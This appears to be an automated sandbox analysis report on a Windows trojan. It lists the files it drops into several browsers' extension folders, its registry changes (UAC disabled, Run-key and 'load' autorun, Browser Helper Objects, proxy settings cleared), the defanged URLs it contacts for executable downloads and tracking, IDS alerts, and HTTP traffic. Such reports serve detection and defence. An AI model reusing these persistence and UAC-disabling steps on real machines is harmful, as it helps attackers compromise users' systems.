C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
%Program Files%\Google\Chrome\Application\54.0.2840.71\resources.pak (597622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\7zxr.dll (18123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\computed_hashes.json (40 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\7zxr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)

The process guide.exe:3788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Google\Chrome\Application\54.0.2840.71\resources.pak (597622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\78017\jyrili.exe (3589 bytes)

The Trojan deletes the following file(s):

%Program Files%\Google\Chrome\Application\54.0.2840.71\resources.pak _bak (0 bytes)

Registry activity

The process tqgb.exe:2772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

The process src2011.tmp:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "84 0C 00 00 97 08 79 4D B8 70 D2 01"
"RegFilesHash" = "E1 3E E8 4E 85 CB E8 11 96 FD 82 0F 1C 5E 6A 66"
"RegFiles0000" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\fixfunction.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\guide.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\istask.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jyrili.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jyueservice.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RIBridage.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView64.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\chromeNativeClient\chromerl.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.dll"
"SessionHash" = "A6 E8 B5 6F 8B 5B 14 2B 8C 6C 7E DC CE 9A 79 BD"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

The process 1819.exe:2816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"wshext.dll,-4511" = "Open &with Command Prompt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process rundll32.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{259407C2-8FA0-425C-9A68-FD1873827037}]
"ConfigGDFBinaryPath" = "C:\Windows\system32\GameUXLegacyGDFs.dll"

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\GameUX\ServiceLocation]
"Games" = "https://games.metaservices.microsoft.com/games/SGamesWebService.asmx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{259407C2-8FA0-425C-9A68-FD1873827037}]
"AppExePath" = "C:\Windows\mm.exe"

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\GameUX]
"OOBGameInstalled" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{259407C2-8FA0-425C-9A68-FD1873827037}]
"ConfigApplicationPath" = "C:\Windows"
"ConfigInstallType" = "3"
"Description" = "Steam: Dark Messiah Might and Magic :Single Playerâ„¢"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{259407C2-8FA0-425C-9A68-FD1873827037}]
"ApplicationId" = "{29dfdaf6-2655-4d7d-9dae-112ce811cf33}"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3e733861cf8347465a0c4e0be2d4b521_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process mm.exe:2928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"tqgb.exe" = "C:\Windows\WindowsUpdate\tqgb.exe"

The process regsvr32.exe:3384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\TypeLib]
"(Default)" = "{9F170339-3C7C-488A-AE2F-9B2349D522DE}"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0]
"(Default)" = "NoteWebHeplerLib"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\InprocServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.dll"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\RLDataView.dll"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}]
"(Default)" = "IRLExtension"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}]
"(Default)" = "ÈÕÀúÄ£¿éÖúÊÖ"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\TypeLib]
"(Default)" = "{9F170339-3C7C-488A-AE2F-9B2349D522DE}"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\Version]
"(Default)" = "1.0"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\InprocServer32]
"ThreadingModel" = "Apartment"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{345E24CA-D936-48F3-992A-BF0071EBBCD0}]
"(Default)" = "ÈÕÀúÄ£¿éÖúÊÖ"

"NoExplorer" = "1"

The process regsvr32.exe:3208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{A6ACF903-2824-4C82-BCB3-D5A39C8A93FA}\1.0]
"(Default)" = "WebAssistLib"

[HKCR\TypeLib\{A6ACF903-2824-4C82-BCB3-D5A39C8A93FA}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll"

[HKCR\Interface\{1BBFD521-B230-4BC0-9E3F-380F6D1DE145}\TypeLib]
"(Default)" = "{A6ACF903-2824-4C82-BCB3-D5A39C8A93FA}"

[HKCR\CLSID\{8002EC7A-C61D-432C-975E-21D616D3B7E7}]
"(Default)" = "ÈÕÀúÄ£¿é¸¨Öú"

[HKCR\CLSID\{8002EC7A-C61D-432C-975E-21D616D3B7E7}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1BBFD521-B230-4BC0-9E3F-380F6D1DE145}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\MozillaPlugins\@jyrili.com/yzwebAssist]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll"

[HKCR\Interface\{1BBFD521-B230-4BC0-9E3F-380F6D1DE145}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{1BBFD521-B230-4BC0-9E3F-380F6D1DE145}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{8002EC7A-C61D-432C-975E-21D616D3B7E7}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{A6ACF903-2824-4C82-BCB3-D5A39C8A93FA}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{8002EC7A-C61D-432C-975E-21D616D3B7E7}\InprocServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll"

[HKCR\Interface\{1BBFD521-B230-4BC0-9E3F-380F6D1DE145}]
"(Default)" = "IWebObject"

[HKCR\CLSID\{8002EC7A-C61D-432C-975E-21D616D3B7E7}\TypeLib]
"(Default)" = "{A6ACF903-2824-4C82-BCB3-D5A39C8A93FA}"

[HKCR\TypeLib\{A6ACF903-2824-4C82-BCB3-D5A39C8A93FA}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8002EC7A-C61D-432C-975E-21D616D3B7E7}]
"NoExplorer" = "1"

"(Default)" = "ÈÕÀúÄ£¿é¸¨Öú"

The process xPiSs.exe:3932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\Windows\kBqJzF\xPiSs.exe"

The process guide.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = ""

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\jychromeex.crx"
"Version" = "4.0.3"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\jychromeex.crx"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\jychromeex.crx"

The process guide.exe:3788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\calendarj\val]
"Src" = "2011"
"UID" = "eac20991f7339f1829e5efdfb10e6fbb"

[HKLM\SOFTWARE\MozillaPlugins\@jyrili.com/yzwebAssist]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper.dll"

[HKCU\Software\calendarj\val]
"Count" = "0"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

a1bbca8139bdabe892df787bea434c33

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://yd.ecoma.ourwebpic.com/ip2city.asp
hxxp://city.ip138.com/ip2city.asp	125.77.197.86
hxxp://e11290.dspg.akamaiedge.net/fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://yd.ecoma.ourwebpic.com/ips.asp?ip=194.242.96.218&action=2
hxxp://movie.metaservices.windowsmedia.com.akadns.net/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2	125.77.197.86
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl
hxxp://183.60.200.160/yy.txt
hxxp://183.60.200.160/1819.exe
hxxp://hostedocsp.globalsign.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU=
hxxp://www.900cpa.cc/tongji.php?ver=hongchen&mac=00:50:56:38:44:C4&pid=2948&did=-1289677981&mid=axac	211.149.219.119
hxxp://dl.jyrili.com.w.kunlunar.com/download/src2011.exe	171.111.154.228
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEAdrg7dKqon
hxxp://www.jyrili.com/client.do/?method=configex&version=4.0.3.0&source=2011&uuid=eac20991f7339f1829e5efdfb10e6fbb	121.42.212.184
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAisW18hq2CY
hxxp://www.jyrili.com/client.do/?method=bm&version=4.0.3.0&source=2011&uuid=eac20991f7339f1829e5efdfb10e6fbb	121.42.212.184
hxxp://www.jyrili.com/client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=eac20991f7339f1829e5efdfb10e6fbb	121.42.212.184
hxxp://dl.jyrili.com.w.kunlunar.com/download/cupdate/cupdate.dat	171.111.154.228
hxxp://23.43.139.27/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://dl.jyrili.com/download/src2011.exe	171.111.154.228
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEAdrg7dKqon	172.217.20.206
hxxp://go.microsoft.com/fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2
hxxp://183.60.200.160:8080/yy.txt
hxxp://movie.metaservices.microsoft.com/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2	65.55.186.113
hxxp://dl.jyrili.com/download/cupdate/cupdate.dat	171.111.154.228
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://183.60.200.160:8080/1819.exe
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCAisW18hq2CY	172.217.20.206
hxxp://www.900cpa.cc:8080/tongji.php?ver=hongchen&mac=00:50:56:38:44:C4&pid=2948&did=-1289677981&mid=axac	211.149.219.119
hxxp://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAqF15UlAVwhXc+YAAQACoXU=	198.41.215.184
hxxp://www.ip138.com/ip2city.asp	87.245.198.83
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl	93.184.220.20
hxxp://www.ip138.com/ips.asp?ip=194.242.96.218&action=2	87.245.198.83
games.metaservices.microsoft.com	65.55.162.26
88.200jh.com	50.117.89.77

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Internal Host Getting External IP Address - ip2city.asp
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.ip138.com

Cache-Control: no-cache

HTTP/1.0 302 Moved Temporarily

Server: Cdn Cache Server V2.0

Date: Tue, 17 Jan 2017 11:53:27 GMT

Content-Length: 0

Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2

GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.ip138.com

Cache-Control: no-cache

HTTP/1.0 302 Moved Temporarily

Server: Cdn Cache Server V2.0

Date: Tue, 17 Jan 2017 11:52:36 GMT

Content-Length: 0

Location: hXXp://city.ip138.com/ip2city.asp

GET /locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: GamesWebServiceLocations

Host: movie.metaservices.microsoft.com

HTTP/1.1 200 OK

Cache-Control: private, max-age=0

Content-Type: text/xml; charset=utf-8

Server: Microsoft-IIS/7.0

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Date: Tue, 17 Jan 2017 11:52:37 GMT

Connection: close

Content-Length: 660
<?xml version="1.0" encoding="utf-8"?>..<ServiceLocaterRespon
se xmlns:xsi="hXXp://VVV.w3.org/2001/XMLSchema-instance" xmlns:xsd="ht
tp://VVV.w3.org/2001/XMLSchema" xmlns="hXXp://VVV.microsoft.com/Micros
oft.WindowsMedia.Services.Platform.Apps.Mds.Locater">..  <Servic
es>..    <ServiceLocation>..      <Name>Games</Name&
gt;..      <Url>hXXps://games.metaservices.microsoft.com/games/S
GamesWebService.asmx</Url>..    </ServiceLocation>..    &l
t;ServiceLocation>..      <Name>GamesFeedback</Name>.. 
     <Url>hXXp://gamesfeedback.metaservices.microsoft.com/gamesF
eedback/GamesFeedbackWebService.asmx</Url>..    </ServiceLoca
tion>..  </Services>..</ServiceLocaterResponse>..

GET /download/cupdate/cupdate.dat HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: dl.jyrili.com

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/octet-stream

Content-Length: 45909

Connection: keep-alive

Date: Tue, 17 Jan 2017 11:34:11 GMT

Last-Modified: Wed, 30 Nov 2016 02:34:39 GMT

ETag: "583e3abf-b355"

Accept-Ranges: bytes

Via: cache19.l2cm12[0,304-0,H], cache4.l2cm12[0,0], kunlun9.cn133[91,200-0,H], kunlun4.cn133[92,0]

Age: 1165

X-Cache: HIT TCP_REFRESH_HIT dirn:11:602530808

X-Swift-SaveTime: Tue, 17 Jan 2017 11:53:36 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: ab6f9ac414846540167475082e
